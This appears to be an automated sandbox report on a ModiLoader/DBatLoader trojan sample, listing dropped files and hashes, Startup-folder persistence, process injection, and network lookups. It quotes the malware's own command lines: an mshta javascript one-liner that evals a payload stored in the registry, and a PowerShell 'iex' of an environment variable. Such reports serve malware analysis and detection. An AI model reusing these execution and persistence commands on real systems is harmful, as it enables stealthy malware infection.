C:\Users\Admin\AppData\Local\7358d4\2d9c5e.1879f4f

MD5 cbc555d14e9213767440945dd51086a0
SHA1 155b14f50c258bedcbeb17614ffbdba2dcbcc6c9
SHA256 f1edfee3805a4fa5a4643e27f0bf4f579e0f325f4d5eab9a0ac37f24c6be9267
SHA512 22620ac1ea284c92d3de76e68c1eaca854915b18434a1b2bb0262fe61c0431220475af9d92199b2b15799ae09bc2170dccf13f26128ce10bd05d208a1245e73e

C:\Users\Admin\AppData\Local\7358d4\e5ae70.lnk

MD5 7e7925dc5fb73c2cc7e6be937769a524
SHA1 2fc32ca2d072df177ce2239f6a8b55fa3f6046f2
SHA256 59b2af5649fbaa3827f1095521a6ba8a88c456a89af42298fbe1f6e226ced75e
SHA512 23a226f45efb625109f69ce8a780fd459dcd5b8f1a29f6113071097822f586ad321109f7c25a30c00ba2f9dbf06bd747ae2986e769b23e390c3963a690eebca3

C:\Users\Admin\AppData\Roaming\e53183\8858ab.1879f4f

MD5 c7475fc5708457d1d87855a369e5ee4e
SHA1 432d73767adbcc9fd3eb9c7dd44c21126f46bd61
SHA256 9bcec62ed16ea01fd5a8edb645533e85a063a3289fcd18f3d18b1f84b5da55f7
SHA512 5539fee94107870b2f71ae782ff41b1e46dc0ce5a079e123b0dbcbd8dae4aeac870eb89b8c07b946d19ca46e0791b707632c0679c5fcdcf9c6955e6a45ad4c1e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk

MD5 b256a7d842b284fe9567a9522359cfe0
SHA1 18da1a55a210290c2ee861443357e732b92be3e0
SHA256 b9b4a24ded6a58c25fc546de06eb82625d626f4e9747d196dcf4ce6178bc154c
SHA512 835fe86677c3737d24a5e8e97a6138cc3b883f045ee2fb071e911421b7de9fb1256d3fb3d79d8cbb5b79aaa54c7469b319ba7032678687a114ebf99c07926baa

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-28 15:24

Reported

2024-05-28 15:26

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4976 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 4976 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 4976 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 4976 wrote to memory of 3908 N/A C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe
PID 4008 wrote to memory of 1728 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4008 wrote to memory of 1728 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4008 wrote to memory of 1728 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\7d72c26893a94c166ed8f490b211dd4c_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:a5Cnx3JAb="fk";Mb6=new%20ActiveXObject("WScript.Shell");I6ly9aN="V";BbY1K5=Mb6.RegRead("HKLM\\software\\Wow6432Node\\nYj7fpIotm\\2bNAlkFA");ghSRm9Ud="lUGjIU";eval(BbY1K5);smB1L="2DGPnqY7";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:qgndum

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

memory/4976-0-0x00000000007C0000-0x00000000007C4000-memory.dmp

memory/4976-1-0x0000000000400000-0x0000000000453000-memory.dmp

memory/3908-3-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4976-4-0x00000000007C0000-0x00000000007C4000-memory.dmp

memory/3908-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/3908-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/3908-9-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-10-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-8-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-7-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-6-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-11-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/3908-12-0x0000000000A10000-0x0000000000AE6000-memory.dmp

memory/1728-14-0x00000000049D0000-0x0000000004A06000-memory.dmp

memory/1728-15-0x0000000005200000-0x0000000005828000-memory.dmp

memory/1728-16-0x0000000005020000-0x0000000005042000-memory.dmp

memory/1728-17-0x0000000005180000-0x00000000051E6000-memory.dmp

memory/1728-18-0x0000000005830000-0x0000000005896000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nujgg1oj.wgj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1728-28-0x0000000005940000-0x0000000005C94000-memory.dmp

memory/1728-29-0x0000000005DA0000-0x0000000005DBE000-memory.dmp

memory/1728-30-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

memory/1728-31-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/1728-32-0x0000000006E40000-0x0000000006E5A000-memory.dmp